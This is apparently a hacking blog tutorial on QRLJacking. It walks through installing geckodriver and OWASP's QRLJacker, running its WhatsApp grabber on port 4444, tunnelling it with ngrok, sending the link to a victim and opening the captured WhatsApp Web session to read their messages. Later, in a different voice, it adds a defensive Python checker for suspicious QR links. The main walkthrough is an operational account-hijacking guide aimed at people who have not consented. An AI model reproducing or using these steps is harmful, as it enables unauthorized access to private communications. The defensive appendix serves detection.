QRL Jacking | Accessing Anyone's WhatsApp Without Touching the Device | 2022 Working


The question newcomers to hacking ask me most often is "How To Hack WhatsApp Without Touching a Victim's Device". So today I'll show how an attacker actually gains access to a victim's account without touching the device or asking the victim for an OTP, using only a social engineering technique.

Before diving in, let me clear up one thing so it's easy to understand what we are going to do. WhatsApp has end-to-end encryption, so it is nearly impossible to directly spy on or read a victim's WhatsApp messages. Different methods are used in different conditions and situations, such as MAC spoofing, OTP phishing, SS7, and some others.

QRLJacking

In this article, I'll show you a method known as QRLJacking, in which the attacker sends a malicious link to the target and gets them to scan a WhatsApp QR code, so that the attacker captures the WhatsApp Web session and can read or respond to messages in it.

Requirements

  • Linux/macOS (Linux Recommended)
  • Firefox Latest Version
  • Python 3.7+
I am going to show a Linux tutorial in this article. 

Steps

  • First of all, download the driver for Firefox (geckodriver) and set it up on your Linux system using the commands given below:
tar -xvf <-type-geckodriver-tar-package-name->
chmod +x geckodriver
sudo mv -f geckodriver /usr/local/share/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
  • Now download and set up the QRLJacking tool using the commands given below:
git clone https://github.com/OWASP/QRLJacking
cd QRLJacking/QRLJacker
pip install -r requirements.txt
python3 QrlJacker.py

The QRLJacker interface now opens in your terminal, as shown in the image.

Now we are ready to perform the QRLJacking attack. Type the commands given below:
use grabber/whatsapp
set port 4444
run
I am testing this tool on my localhost (you can do port forwarding for out-of-LAN devices, and I recommend using ngrok for it), so my port is 4444 and the host is 0.0.0.0 in this tutorial. In my case, the QR code link is 0.0.0.0:4444.

Now send that link to the victim. Once the victim scans the WhatsApp Web QR code, the attacker gets a session saved in this tool, which can later be used to access the WhatsApp Web session.
  • Press Ctrl+C to interrupt the QRLJacker tool and type the command given below:
sessions
  • The list of saved sessions is now shown in your terminal (in my case "0"):
sessions -i 0
Now wait a few seconds. Firefox launches automatically and opens the victim's WhatsApp Web session, as shown in the image given below.
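
Seen from the defender's side, the one thing the victim can observe in this attack is the link itself: the QR code is served from the attacker's host and port (0.0.0.0:4444 here, or an ngrok tunnel) instead of from WhatsApp. The Python check below is an added example, not part of the original article or of the QRLJacking project; it lists the reasons a link that claims to show a WhatsApp Web QR code should not be trusted. The function name, the tunnel suffix list and the sample links are assumptions constructed for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumption: the only legitimate origin for the WhatsApp Web pairing QR code.
OFFICIAL_HOST = "web.whatsapp.com"
# Assumption: constructed, non-exhaustive list of tunnelling-service suffixes.
TUNNEL_SUFFIXES = (".ngrok.io", ".ngrok-free.app", ".ngrok.app")


def qr_link_findings(link: str) -> list[str]:
    """Return the reasons a 'WhatsApp Web QR code' link is suspect ([] = official)."""
    # Links such as "0.0.0.0:4444" arrive without a scheme; add one so they parse.
    url = urlsplit(link if "://" in link else "http://" + link)
    # .hostname ignores any "user@" prefix, so "web.whatsapp.com@evil" is not fooled.
    host = (url.hostname or "").lower().rstrip(".")
    findings = []
    try:
        port = url.port
    except ValueError:  # port is not a number or is out of range
        port = None
        findings.append("malformed port")
    if host != OFFICIAL_HOST:
        findings.append("host is not " + OFFICIAL_HOST)
    if url.scheme != "https":
        findings.append("not served over https")
    try:
        ipaddress.ip_address(host)
        findings.append("host is a raw IP address")
    except ValueError:
        pass  # a DNS name, not an IP literal
    if port not in (None, 80, 443):
        findings.append(f"non-standard port {port}")
    if host.endswith(TUNNEL_SUFFIXES):
        findings.append("host is a tunnelling-service subdomain")
    return findings


if __name__ == "__main__":
    # Constructed sample links: official, the tutorial's link, and two lookalikes.
    for sample in ("https://web.whatsapp.com/",
                   "0.0.0.0:4444",
                   "https://web.whatsapp.com@198.51.100.7:4444/",
                   "https://abc123.ngrok-free.app/"):
        print(sample, "->", qr_link_findings(sample) or "ok")
```

The same rules can be applied in a mail or chat gateway to flag links before they reach users. On the account side, an unexpected entry in WhatsApp's Linked Devices list is the sign that a session has already been captured.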

I hope this information is helpful to you. If you still face any problems or errors, feel free to reach me. If you want to learn complete Ethical Hacking from scratch, try our "Hacking Like Watch Dogs" course and start your journey today. Thanks for reading, until next time.